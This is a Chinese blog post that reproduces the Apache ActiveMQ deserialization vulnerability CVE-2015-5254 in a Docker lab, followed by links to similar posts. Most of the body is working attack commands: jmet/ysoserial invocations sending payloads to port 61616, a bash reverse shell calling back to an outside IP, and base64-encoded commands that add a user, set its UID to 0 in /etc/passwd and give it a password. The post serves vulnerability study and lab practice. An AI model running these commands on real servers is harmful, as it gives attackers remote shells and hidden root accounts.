ActiveMQ 反序列化漏洞 (CVE-2015-5254)

最新推荐文章于 2024-07-17 23:51:10 发布
最新推荐文章于 2024-07-17 23:51:10 发布
阅读量742 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全 java spring activemq web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/122553053
版权

漏洞简介

Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。

Apache ActiveMQ 5.x版本之前的5.13.0安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。

漏洞环境

Docker -compose up -d

运行环境后,会在61616和8161端口建立两个端口,61616端口是工作端口,消息在这个端口上传递。8161端口为网页管理页面端口。访问http://your-ip:8161,可以看到网络管理页面,但是这个漏洞理论上不需要管理页面

漏洞复现

漏洞利用过程如下:

生成序列化的有效负载(你可以使用 ysoserial)

将有效负载发送到端口 61616

访问web管理页面并读取序列化消息,然后您就可以触发漏洞。

为了利用这个环境,我们将使用jmet(Java 消息利用工具)。首先下载jmet的jar文件,在同一目录下创建external文件夹(否则可能会出现文件夹不存在的错误)。

jmet是使用ysoserial生成Payload并发送(jar自带ysoserial,我们不需要重新下载),所以需要选择一个可以在ysoserial中使用的gadget,比如ROME .

执行:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

 

可以看到后台已经生成了此事件

 点击事件进入事件详情

再次点击事件id,进行触发

 进入容器内部发现成功创建了success文件,说明此漏洞是可以利用的

反弹shell 利用  ,需要进行bash编码

java -jar jmet-0.1.0-all.jar -Q shell -I ActiveMQ -s -Y "bash -i >& /dev/tcp/192.200.29.90/1234 0>&1" -Yp ROME 192.168.230.142   61616

 

 通过消息端口创建反弹shell事件队列

 

 点击事件id进行触发

成功获取shell权限

 

添加用户

1.依次创建3个事件,添加用户 修改权限  修改密码

java -jar jmet-0.1.0-all.jar -Q useradd -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 test" -Yp ROME  192.168.230.142  61616   ---添加用户

java -jar jmet-0.1.0-all.jar -Q tiquan -I ActiveMQ -s -Y "sed -i "s/test:x:10010/test:x:0/g" /etc/passwd" -Yp ROME   192.168.230.142  61616  ---修改权限

java -jar jmet-0.1.0-all.jar -Q chpasswd -I ActiveMQ -s -Y "echo "test:sd123456" | chpasswd" -Yp ROME   192.168.230.142   61616  ---修改密码

依次进行bash编码

java -jar jmet-0.1.0-all.jar -Q useradd -I ActiveMQ -s -Y "bash -c {echo,dXNlcmFkZCAtZyByb290IC1zIC9iaW4vYmFzaCAtdSAxMDAxMCB0ZXN0}|{base64,-d}|{bash,-i}" -Yp ROME  192.168.230.142  61616

 

 

提权

 

java -jar jmet-0.1.0-all.jar -Q tiquan -I ActiveMQ -s -Y "bash -c {echo,c2VkIC1pICJzL3Rlc3Q6eDoxMDAxMC90ZXN0Ong6MC9nIiAvZXRjL3Bhc3N3ZA==}|{base64,-d}|{bash,-i}" -Yp ROME   192.168.230.142  61616

 

 

添加密码

 

java -jar jmet-0.1.0-all.jar -Q chpasswd -I ActiveMQ -s -Y "bash -c {echo,ZWNobyAidGVzdDpzZDEyMzQ1NiIgfCBjaHBhc3N3ZA==}|{base64,-d}|{bash,-i}" -Yp ROME   192.168.230.142   61616 

 

成功创建用户

 已经成功创建test用户,密码为sd123456  权限为root

 

 

 

 

 

 

 

Sword-heart
关注
专栏目录
漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 625
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
漏洞复现】---- ActiveMQ 反序列化漏洞CVE-2015-5254
qq_43168364的博客
09-04 702
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
ActiveMQ 反序列化RCE漏洞CVE-2023-46604)
最新发布
zneVue
07-17 665
在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。
ActiveMQ 反序列化漏洞CVE-2015-5254
The code way of kinnisoy
10-24 2012
ActiveMQ 反序列化漏洞CVE-2015-5254
ActiveMQ 反序列化漏洞(CVE-2015-5254)
晚风不及你
03-15 257
漏洞编号 CVE-2015-5254 漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 漏洞影响 Apache ActiveMQ 5.x ~ 5.13.0 漏洞利用 1.vulhub使用dock
ActiveMQ反序列化漏洞CVE-2015-5254
Kevin's Blog
06-02 1824
文章目录一、介绍1.1 简介1.2 影响版本1.3 漏洞成因1.4 利用限制1.4 业务场景1.5 使用概率二、模拟环境三、漏洞利用3.1 信息收集3.2 漏洞复现 一、介绍 1.1 简介   Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等 1.2 影响版本 Apache ActiveMQ < 5.x 1.3 漏洞成因   漏洞没有限制在代理
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2916
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
ActiveMQ反序列化漏洞(CVE-2015-5254)
07-16 516
1.漏洞介绍:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任...
ActiveMQ反序列化漏洞CVE-2015-5254复现
weixin_51387754的博客
06-19 436
ActiveMQ反序列化漏洞CVE-2015-5254)复现漏洞前言0x01 漏洞环境 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 0x0
阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)
Ayixy的博客
05-24 857
ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利⽤链,这是。【命令解释】:调⽤java -jar 运⾏ jmet的jar包,-Q是插⼊⼀个名为event的队列,-I 是选择装载。阿⾥云ip为公⽹,公⽹⽆法找到内⽹ip,所以不成。使⽤命令:nmap -p- -A -O 192.168.110.145(需切换到root在执⾏)3.没有查看队列所有消息的⽤户名和密码下,只能管理员/⽤户去点击我们插⼊的消息才能触发(⽐较鸡。
CVECVE-2015-5254ActiveMQ 反序列化漏洞利用
边扯边淡
03-15 1882
起序:复现不难,就是需要好好的准备好靶场环境。 一、靶场环境 使用的是 github 上的 vulhub 环境。ActiveMQ 版本为 5.11.1。 vulhub:https://github.com/vulhub/vulhub 1、漏洞反序列化漏洞漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2、影响版本 ActiveMQ < 5.13.0 之前 5.x 版本。 .
ActiveMQ 反序列化漏洞
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值